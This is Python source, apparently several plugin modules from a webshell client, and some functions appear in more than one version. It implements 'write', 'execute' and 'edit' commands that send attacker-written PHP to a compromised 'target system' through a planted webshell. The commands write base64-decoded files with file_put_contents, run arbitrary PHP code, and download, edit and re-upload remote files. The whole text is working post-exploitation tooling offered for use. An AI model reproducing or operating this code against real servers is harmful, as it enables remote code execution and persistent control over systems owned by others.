def run(web_file_path: str, editor: str = ""): """ write Write files directly to the target system by notepad / vi as default or your own editor. eg: write {web_file_path} {editor=""} """ file_name = str(uuid4()) file_path = gget("webshell.download_path", "webshell") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name).replace("\\", "/") open(real_file_path, 'a').close() open_editor(real_file_path, editor) with open(real_file_path, "r") as f: result = base64_encode(f.read()) res = send( f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));" ) if (not res): return text = res.r_text.strip() if (match(r"\d+", text)): print(color.green(f"\nWrite {web_file_path} success.\n")) else: print(color.red(f"\nWrite {web_file_path} failed.\n")) remove(real_file_path)
def run(editor: str = ""): """ execute execute Custom PHP code by notepad / vi as default or your own editor. eg: execute {editor=""} """ file_name = str(uuid4()) file_path = gget("webshell.download_path", "webshell") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name).replace("\\", "/") open(real_file_path, "a").close() open_editor(real_file_path, editor) with open(real_file_path, "r") as f: code = f.read() if (code.startswith("<?php")): code = code[5:] if (code.endswith("?>")): code = code[:-2] print(color.yellow("Execute php code...")) res = send(code) if (not res): return text = res.r_text.strip() status_code = color.green(str( res.status_code)) if res.status_code == 200 else color.yellow( str(res.status_code)) print( f"\n{color.green('Result:')}\n[{status_code}] {color.cyan('length')}: {len(text)} \n{text}\n" ) remove(real_file_path)
def run(web_file_path: str): """ write Write files directly to the target system by notepad/vi. eg: write {web_file_path} """ file_name = path.split(web_file_path)[1] file_path = gget("webshell.download_path", "webshell").replace(":", "_") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name) with open(real_file_path, "w"): pass open_editor(real_file_path) with open(real_file_path, "r") as f: result = base64_encode(f.read()) res = send( f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));" ) if (not res): return text = res.r_text.strip() if (match(r"\w+", text) and text != '0'): print(color.green(f"\nWrite {web_file_path} success.\n")) else: print( color.red(f"\nWrite {web_file_path} failed.") + color.yellow("\n\nResponse:") + f"\n{text}\n") remove(real_file_path)
def run(): """ execute execute Custom PHP code by notepad/vi. eg: execute """ file_name = "tmp" + str(uuid4()) file_path = gget("webshell.download_path", "webshell").replace(":", "_") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name) with open(real_file_path, "w"): pass open_editor(real_file_path) with open(real_file_path, "r") as f: code = f.read().strip("<?php").strip("?>") print(color.yellow("Execute php code...")) res = send(code) if (not res): return text = res.r_text.strip() print(color.green("\nResult:\n") + text + "\n") remove(real_file_path)
def run(editor: str = ""): """ execute execute Custom PHP code by notepad / vi as default or your own editor. eg: execute {editor=""} """ file_name = str(uuid4()) file_path = gget("webshell.download_path", "webshell") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name).replace("\\", "/") open(real_file_path, "a").close() open_editor(real_file_path, editor) with open(real_file_path, "r") as f: code = f.read().strip("<?php").strip("?>") print(color.yellow("Execute php code...")) res = send(code) if (not res): return text = res.r_text.strip() print(color.green("\nResult:\n") + text + "\n") remove(real_file_path)
def run(web_file_path: str, editor: str = ""): """ edit edit file from target system (download->edit->upload) by notepad / vi as default or your own editor. eg: edit {web_file_path} {editor=""} """ webshell_pf = gget("webshell.pf") download_file_path = webshell_pf["download"].run(web_file_path) if (not download_file_path): return flag = open_editor(download_file_path, editor) if (not flag): print("\n" + color.red(f"Call {editor} failed") + "\n") return webshell_pf["upload"].run(download_file_path, web_file_path, True)
def run(web_file_path: str): """ edit edit file from target system (download->edit->upload) by notepad/vi. eg: edit {web_file_path} """ webshell_pf = gget("webshell.pf") download_file_path = webshell_pf["download"].run(web_file_path) if (not download_file_path): return flag = open_editor(download_file_path) if (not flag): print("\n" + color.red("Call vi / notepad failed") + "\n") return webshell_pf["upload"].run(download_file_path, web_file_path, True)